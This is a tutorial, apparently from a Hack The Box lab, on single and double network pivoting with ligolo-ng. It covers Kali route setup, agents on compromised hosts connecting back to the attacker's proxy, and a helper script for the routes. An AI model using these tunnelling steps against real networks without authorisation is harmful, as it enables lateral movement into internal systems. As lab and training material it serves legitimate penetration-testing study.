I did this in HTB Dante. I will write this post as generically as possible.
Assume you already have access to a machine, e.g. 10.10.110.X. You notice that it has access to the 172.16.1.0/24 network.
You want to access 172.16.1.0/24 from your local Kali machine, 10.10.14.2.
The end result should look something like this:
Download the agent and proxy binaries from the ligolo-ng GitHub repository.
Transfer the agent file to the target machine, 10.10.110.X.
Set up the tun interface and the route on Kali by running these commands:
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.1.0/24 dev ligolo
Now it is time to establish the connection.
Kali:
sudo ./proxy -selfcert
Target:
chmod +x agent
./agent -connect 10.10.14.2:11601 -ignore-cert
You can see that the agent has joined, so we are going to start the session on Kali (select the session number, then start it):
session
1
start
In a new terminal window, you should now be able to ping machines in 172.16.1.0/24.
Double Pivoting
Assumptions: your Kali machine is able to reach the 172.16.1.0/24 network using ligolo-ng from the previous step. Now you want it to reach 172.16.2.0/24 as well. The machine that has connectivity to 172.16.2.0/24 is 172.16.1.A.
The end result should look like this image:
On Kali, add another route:
sudo ip route add 172.16.2.0/24 dev ligolo
Transfer the agent file to 172.16.1.A. It will be agent.exe if it is a Windows machine.
Run the same command as before:
agent.exe -connect 10.10.14.2:11601 -ignore-cert
On your original ligolo-ng proxy screen, you can see that a new agent has joined. Switch to this new agent (confirm with "Yes" when prompted):
session
2
start
Yes
Now ping should work for IPs in either subnet.
However, you will only be able to reach one machine, e.g. 172.16.2.B, because you are pivoting from 172.16.1.A. If you want to reach other machines in 172.16.2.0/24, you have to pivot from 172.16.2.B.
On 172.16.2.B, which you currently have access to, transfer the agent file and run the same command again:
./agent.exe -connect 10.10.14.2:11601 -ignore-cert
On the proxy window, switch session by running the same commands:
session
3
start
Yes
Now you are able to access machines in both subnets.
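As an added example (not from the original post or from ligolo-ng itself), here is a small script that wraps the Kali-side setup from both pivots above: it creates the tun interface only if it is missing, adds one route per pivoted subnet so it can be re-run safely, and tears everything down afterwards. The interface name (IFACE, defaulting to "ligolo") and the DRY_RUN variable are assumptions; with DRY_RUN=1 it only prints the commands instead of running them.

```shell
#!/bin/sh
# Added example, not from the original post: idempotent setup and teardown of
# the Kali-side tun interface and routes used with ligolo-ng. Assumed names:
# IFACE (interface, default "ligolo") and DRY_RUN (print instead of execute).
set -eu

IFACE="${IFACE:-ligolo}"
DRY_RUN="${DRY_RUN:-0}"

# Execute a privileged command, or just print it when DRY_RUN=1.
run() {
  if [ "$DRY_RUN" = "1" ]; then
    printf '%s\n' "$*"
  else
    sudo "$@"
  fi
}

# Create the tun interface once and add one route per pivoted subnet,
# e.g. ligolo_up 172.16.1.0/24 172.16.2.0/24 (the second pivot adds the second route).
ligolo_up() {
  # "ip link show" fails while the interface does not exist yet.
  if [ "$DRY_RUN" = "1" ] || ! ip link show "$IFACE" >/dev/null 2>&1; then
    run ip tuntap add user root mode tun "$IFACE"
  fi
  run ip link set "$IFACE" up
  for subnet in "$@"; do
    # Skip routes that are already present so the script can be re-run safely.
    if [ "$DRY_RUN" = "1" ] || ! ip route show "$subnet" dev "$IFACE" | grep -q .; then
      run ip route add "$subnet" dev "$IFACE"
    fi
  done
}

# Remove the routes and the interface when the pivot is no longer needed.
ligolo_down() {
  for subnet in "$@"; do
    run ip route del "$subnet" dev "$IFACE"
  done
  run ip link delete "$IFACE"
}

# Usage: ./ligolo-routes.sh up 172.16.1.0/24 172.16.2.0/24   (or "down" with the same subnets)
case "${1:-}" in
  up)   shift; ligolo_up "$@" ;;
  down) shift; ligolo_down "$@" ;;
esac
```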
Cheers!